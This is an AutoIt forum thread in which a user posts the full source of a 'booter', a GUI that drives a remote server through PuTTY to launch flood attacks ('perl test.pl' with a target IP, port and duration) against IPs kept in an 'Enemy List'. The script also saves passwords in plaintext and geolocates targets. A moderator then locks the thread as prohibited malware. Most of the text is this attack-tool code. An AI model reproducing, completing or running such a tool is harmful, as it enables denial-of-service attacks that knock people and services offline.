DopeHN Posted May 12, 2012 Posted May 12, 2012 (edited) Need help im getting this error when i try to run my scripthttp://gyazo.com/11ef2142d509b05ce4939add4c82f932please help i am willing to use teamviewer if someone is able to help me.expandcollapse popup#Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_Icon=dip.ico #AutoIt3Wrapper_Res_Fileversion=1.0.0.0 #AutoIt3Wrapper_Res_Language=1033 #AutoIt3Wrapper_Res_requestedExecutionLevel=asInvoker #AutoIt3Wrapper_Run_Obfuscator=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #include <ButtonConstants.au3> #include <EditConstants.au3> #include <GUIConstantsEx.au3> #include <GuiIPAddress.au3> #include <StaticConstants.au3> #include <WindowsConstants.au3> #include <String.au3> #include <GuiListView.au3> #include <Array.au3> #Region ### START Koda GUI section ### Form= $GUI = GUICreate("DOPE BOOTER", 383, 273, 728, 125) GUISetBkColor(0xFFFFFF) GUICtrlCreateTab(4, 4, 376, 268) GUICtrlCreateTabItem("Booter") $Button4 = GUICtrlCreateButton("Enable More Booting Options", 7, 169, 147, 27) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Button5 = GUICtrlCreateButton("1", 156, 169, 19, 27) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Button6 = GUICtrlCreateButton("2", 176, 169, 19, 27) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Button7 = GUICtrlCreateButton("X", 196, 169, 19, 27) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Button8 = GUICtrlCreateButton("4", 216, 169, 19, 27) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Button9 = GUICtrlCreateButton("5", 236, 169, 19, 27) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Button10 = GUICtrlCreateButton("6", 256, 169, 19, 27) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Button11 = GUICtrlCreateButton("7", 276, 169, 19, 27) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Button12 = GUICtrlCreateButton("8", 296, 169, 19, 27) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Button13 = GUICtrlCreateButton("Descriptions", 316, 169, 57, 27) GUICtrlSetFont(-1, 7, 400, 0, "Arial") $Label3 = GUICtrlCreateLabel("DOPE BOOTER", 206, 37, 170, 17) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Labe14 = GUICtrlCreateLabel("Skype me @ DopeBooter", 186, 57, 170, 17) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $IPAddress = GUICtrlCreateInput("1.1.1.1", 18, 67, 130, 22, BitOR($GUI_SS_DEFAULT_INPUT,$ES_NUMBER)) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Port = GUICtrlCreateInput("80", 43, 94, 105, 22, BitOR($GUI_SS_DEFAULT_INPUT,$ES_NUMBER)) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Time = GUICtrlCreateInput("600", 99, 118, 49, 22, BitOR($GUI_SS_DEFAULT_INPUT,$ES_NUMBER)) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Button1 = GUICtrlCreateButton("Begin Boot", 11, 140, 65, 25) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Button2 = GUICtrlCreateButton("Visit HackersNation.com", 210, 140, 123, 25) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Button3 = GUICtrlCreateButton("IP Location", 144, 140, 65, 25) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Text1 = GUICtrlCreateLabel("IP Boot Time", 19, 120, 76, 17) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Label1 = GUICtrlCreateLabel("Port", 19, 94, 23, 17) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Group3 = GUICtrlCreateGroup("", 26, 41, 113, 25) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Label2 = GUICtrlCreateLabel("INSERT IP BELOW", 33, 49, 99, 17) GUICtrlCreateGroup("", -99, -99, 1, 1) $Username = GUICtrlCreateInput("Username", 20, 207, 129, 22) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Password = GUICtrlCreateInput("Password", 20, 235, 129, 22, BitOR($GUI_SS_DEFAULT_INPUT,$ES_PASSWORD)) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Signin = GUICtrlCreateButton("Sign Into Booter", 154, 207, 107, 22) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Stopboot = GUICtrlCreateButton("Stop Attack", 78, 140, 65, 25) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Checkbox1 = GUICtrlCreateCheckbox("Save Login Info", 156, 237, 111, 17) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Label4 = GUICtrlCreateLabel("© Copyright All Rights Reserved", 172, 79, 156, 17) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Button14 = GUICtrlCreateButton("Buy Account", 272, 207, 75, 22) GUICtrlSetFont(-1, 8, 400, 0, "Arial") GUICtrlCreateTabItem("Enemy List") $list = GUICtrlCreateListView("", 10, 57, 300, 202) GUICtrlSendMsg(-1, $LVM_SETCOLUMNWIDTH, 0, 50) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Input1 = GUICtrlCreateInput("Name", 16, 31, 121, 22) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Input2 = GUICtrlCreateInput("IP", 140, 31, 121, 22) GUICtrlSetFont(-1, 8, 400, 0, "Arial") $Add = GUICtrlCreateButton("Add", 262, 31, 43, 23) GUICtrlSetFont(-1, 8, 400, 0, "Arial") GUICtrlCreateTabItem("Terms of Service") $tos = GUICtrlCreateEdit("By using this program/service you agree to the following." & @CRLF & @CRLF & "You will use this program ONLY for educational purposes. You agree to never distribute this program even if you alter this program. You agree that you will not share login info with anyone other than yourself. You are aware that this service and or booter can end at any time without notice and there will be no refunds with no exceptions. ", 8, 30, 364, 230, $ES_READONLY) GUICtrlCreateTabItem("") $user = IniRead("login.ini", "login", "username", "") If $user <> "" Then GUICtrlSetData($Username, $user) $pass = IniRead("login.ini", "login", "password", "") If $pass <> "" Then GUICtrlSetData($Password, $pass) $enemies = IniReadSectionNames("enemies.ini") $col1 = _GUICtrlListView_AddColumn($list, "Name", 150) $col2 = _GUICtrlListView_AddColumn($list, "IP", 90) If Not @error Then _ArrayDelete($enemies, 0) For $enemy In $enemies _GUICtrlListView_AddItem($list, $enemy) _GUICtrlListView_AddSubItem($list, _GUICtrlListView_GetItemCount($list) - 1, IniRead("enemies.ini", $enemy, "ip", ""), $col2) Next EndIf GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit Case $Button2 ShellExecute("http://hackersnation.com/forum/member.php?action=register&referrer=1756") Case $Button14 ShellExecute("http://dopesipboot.webs.com/buy-now") Case $Button1 If StringRegExp(GUICtrlRead($IPAddress), "b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)b") Then $cmd="perl test.pl "& GUICtrlRead($IPAddress)&" " & Guictrlread($Port) & " 0 " & GUICtrlRead($Time) If ProcessExists("putty.exe") Then WinActivate("[CLASS:PuTTY]") ControlSend("[CLASS:PuTTY]", "", "", $cmd & "{ENTER}") Else MsgBox(0,"","Must Sign In To Begin Boot",0,$GUI) EndIf EndIf Case $Signin If GUICtrlRead($Checkbox1) = $GUI_CHECKED Then IniWrite("login.ini", "login", "username", GUICtrlRead($Username)) IniWrite("login.ini", "login", "password", GUICtrlRead($Password)) EndIf Run("putty.exe -ssh " & GUICtrlRead($Username) & "@199.180.132.247") Sleep(3000) ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($Password) & "{ENTER}") Case $Stopboot $cmd="Ctrl+C" If ProcessExists("putty.exe") Then WinActivate("[CLASS:PuTTY") ControlSend("[CLASS:PuTTY]", "", "", "{CTRLDOWN}" & "{C}" & "{CTRLUP}") Else MsgBox(0,"","Must Sign In To End Boot",0,$GUI) EndIf Case $Button4 If ProcessExists("putty.exe") Then WinActivate("[CLASS:PuTTY]") ControlSend("[CLASS:PuTTY]", "", "","{c}") ControlSend("[CLASS:PuTTY]", "", "","{d}") ControlSend("[CLASS:PuTTY]", "", "","{SPACE}") ControlSend("[CLASS:PuTTY]", "", "","{b}") ControlSend("[CLASS:PuTTY]", "", "","{a}") ControlSend("[CLASS:PuTTY]", "", "","{s}") ControlSend("[CLASS:PuTTY]", "", "","{h}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") ControlSend("[CLASS:PuTTY]", "", "","{.}") ControlSend("[CLASS:PuTTY]", "", "","{/}") ControlSend("[CLASS:PuTTY]", "", "","{l}") ControlSend("[CLASS:PuTTY]", "", "","{a}") ControlSend("[CLASS:PuTTY]", "", "","{u}") ControlSend("[CLASS:PuTTY]", "", "","{n}") ControlSend("[CLASS:PuTTY]", "", "","{c}") ControlSend("[CLASS:PuTTY]", "", "","{h}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") Else MsgBox(0,"","Must Sign In For Booter Options",0,$GUI) EndIf Case $Button5 If ProcessExists("putty.exe") Then WinActivate("[CLASS:PuTTY]") ControlSend("[CLASS:PuTTY]", "", "","{1}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($IPAddress) & "{ENTER}") Sleep(800) ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($Port) & "{ENTER}") Sleep(800) ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($Time) & "{ENTER}") Sleep(800) ControlSend("[CLASS:PuTTY]", "", "","{5}") ControlSend("[CLASS:PuTTY]", "", "","{0}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") Else MsgBox(0,"","Must Sign In For Booter Options",0,$GUI) EndIf Case $Button6 If ProcessExists("putty.exe") Then WinActivate("[CLASS:PuTTY]") ControlSend("[CLASS:PuTTY]", "", "","{2}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($IPAddress) & "{ENTER}") Sleep(800) ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($Port) & "{ENTER}") Sleep(800) ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($Time) & "{ENTER}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") Else MsgBox(0,"","Must Sign In For Booter Options",0,$GUI) EndIf Case $Button7 If ProcessExists("putty.exe") Then Else MsgBox(0,"","Must Sign In For Booter Options",0,$GUI) EndIf If ProcessExists("putty.exe") Then Else MsgBox(0,"","Option 3 is disabled please never try to mannualy use option 3 as it will not work.",0,$GUI) EndIf Case $Button8 If ProcessExists("putty.exe") Then WinActivate("[CLASS:PuTTY]") ControlSend("[CLASS:PuTTY]", "", "","{4}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($IPAddress) & "{ENTER}") ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($Port) & "{ENTER}") ControlSend("[CLASS:PuTTY]", "", "","{5}") ControlSend("[CLASS:PuTTY]", "", "","{0}") ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($Time) & "{ENTER}") Else MsgBox(0,"","Must Sign In For Booter Options",0,$GUI) EndIf Case $Button9 If ProcessExists("putty.exe") Then WinActivate("[CLASS:PuTTY]") ControlSend("[CLASS:PuTTY]", "", "","{5}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($IPAddress) & "{ENTER}") ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($Port) & "{ENTER}") ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($Time) & "{ENTER}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") Else MsgBox(0,"","Must Sign In For Booter Options",0,$GUI) EndIf Case $Button10 If ProcessExists("putty.exe") Then WinActivate("[CLASS:PuTTY]") ControlSend("[CLASS:PuTTY]", "", "","{6}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($IPAddress) & "{ENTER}") ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($Port) & "{ENTER}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") Else MsgBox(0,"","Must Sign In For Booter Options",0,$GUI) EndIf Case $Button11 If ProcessExists("putty.exe") Then WinActivate("[CLASS:PuTTY]") ControlSend("[CLASS:PuTTY]", "", "","{7}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($IPAddress) & "{ENTER}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") Else MsgBox(0,"","Must Sign In For Booter Options",0,$GUI) EndIf Case $Button12 If ProcessExists("putty.exe") Then WinActivate("[CLASS:PuTTY]") ControlSend("[CLASS:PuTTY]", "", "","{8}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($IPAddress) & "{ENTER}") ControlSend("[CLASS:PuTTY]", "", "", GUICtrlRead($Port) & "{ENTER}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") Else MsgBox(0,"","Must Sign In For Booter Options",0,$GUI) EndIf Case $Button13 If ProcessExists("putty.exe") Then WinActivate("[CLASS:PuTTY]") ControlSend("[CLASS:PuTTY]", "", "","{9}") ControlSend("[CLASS:PuTTY]", "", "","{ENTER}") Else MsgBox(0,"","Must Sign In For Booter Options",0,$GUI) EndIf Case $Button3 If StringRegExp(GUICtrlRead($IPAddress), "b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)b") Then If ProcessExists("putty.exe") Then WinActivate("[CLASS:PuTTY]") ControlSend("[CLASS:PuTTY]", "", "", $cmd & "{ENTER}") $html = BinaryToString(InetRead("http://whatismyipaddress.com/ip/" & GUICtrlRead($IPAddress))) $string = "" $city = _StringBetween($html, "City:</th><td>", "</td></tr>") If Not @error Then $string &= "CITY: " & $city[0] & @CRLF $state = _StringBetween($html, "State/Region:</th><td>", "</td></tr>") If Not @error Then $string &= "STATE/REGION: " & $state[0] & @CRLF $country = _StringBetween($html, "Country:</th><td>", "<img src") If Not @error Then $string &= "COUNTRY: " & $country[0] If $string = "" Or StringLen($string) > 200 Then $string = "Please Insert A Valid IP" MsgBox(0,"Location",$string,0,$GUI) Else MsgBox(0,"","Must Sign In For IP Location",0,$GUI) EndIf EndIf Case $Add _GUICtrlListView_AddItem($list, GUICtrlRead($Input1)) _GUICtrlListView_AddSubItem($list, _GUICtrlListView_GetItemCount($list) - 1, GUICtrlRead($Input2), $col2) IniWrite("enemies.ini", GUICtrlRead($Input1), "ip", GUICtrlRead($Input2)) EndSwitch WEnd Edited May 12, 2012 by DopeHN
Moderators Melba23 Posted May 12, 2012 Moderators Posted May 12, 2012 DopeHN,Welcome to the AutoIt forum. Judging from the line that gave the error:For $enemy in $enemiesthis is a script for a game. Please read the Forum Rules - particularly the bit about not discussing game automation - and then you will understand why you will get no help and this thread will now be locked. See you soon with a legitimate question I hope. M23 Any of my own code posted anywhere on the forum is available for use by others without any restriction of any kind Open spoiler to see my UDFs: Spoiler ArrayMultiColSort ---- Sort arrays on multiple columnsChooseFileFolder ---- Single and multiple selections from specified path treeview listingDate_Time_Convert -- Easily convert date/time formats, including the language usedExtMsgBox --------- A highly customisable replacement for MsgBoxGUIExtender -------- Extend and retract multiple sections within a GUIGUIFrame ---------- Subdivide GUIs into many adjustable framesGUIListViewEx ------- Insert, delete, move, drag, sort, edit and colour ListView itemsGUITreeViewEx ------ Check/clear parent and child checkboxes in a TreeViewMarquee ----------- Scrolling tickertape GUIsNoFocusLines ------- Remove the dotted focus lines from buttons, sliders, radios and checkboxesNotify ------------- Small notifications on the edge of the displayScrollbars ----------Automatically sized scrollbars with a single commandStringSize ---------- Automatically size controls to fit textToast -------------- Small GUIs which pop out of the notification area
Moderators Melba23 Posted May 12, 2012 Moderators Posted May 12, 2012 DopeHN PMed me to claim that the script was not a game and provided the script in question.He was quite correct - the script was not for a game. It was for a "booter" to kick other people off on-line nets - and so falls under the "other forms of malware" prohibition.The thread therefore remains locked. I was tempted to ban him for sheer stupidity - but pleading that the script was not for a game when in fact it was for something else that is prohibited here made me laugh so much that I have decided not to do so this time. But I have suggested that he takes the time to read the rules carefully as any further transgressions on his part will lead to serious sanctions. M23 Any of my own code posted anywhere on the forum is available for use by others without any restriction of any kind Open spoiler to see my UDFs: Spoiler ArrayMultiColSort ---- Sort arrays on multiple columnsChooseFileFolder ---- Single and multiple selections from specified path treeview listingDate_Time_Convert -- Easily convert date/time formats, including the language usedExtMsgBox --------- A highly customisable replacement for MsgBoxGUIExtender -------- Extend and retract multiple sections within a GUIGUIFrame ---------- Subdivide GUIs into many adjustable framesGUIListViewEx ------- Insert, delete, move, drag, sort, edit and colour ListView itemsGUITreeViewEx ------ Check/clear parent and child checkboxes in a TreeViewMarquee ----------- Scrolling tickertape GUIsNoFocusLines ------- Remove the dotted focus lines from buttons, sliders, radios and checkboxesNotify ------------- Small notifications on the edge of the displayScrollbars ----------Automatically sized scrollbars with a single commandStringSize ---------- Automatically size controls to fit textToast -------------- Small GUIs which pop out of the notification area
Recommended Posts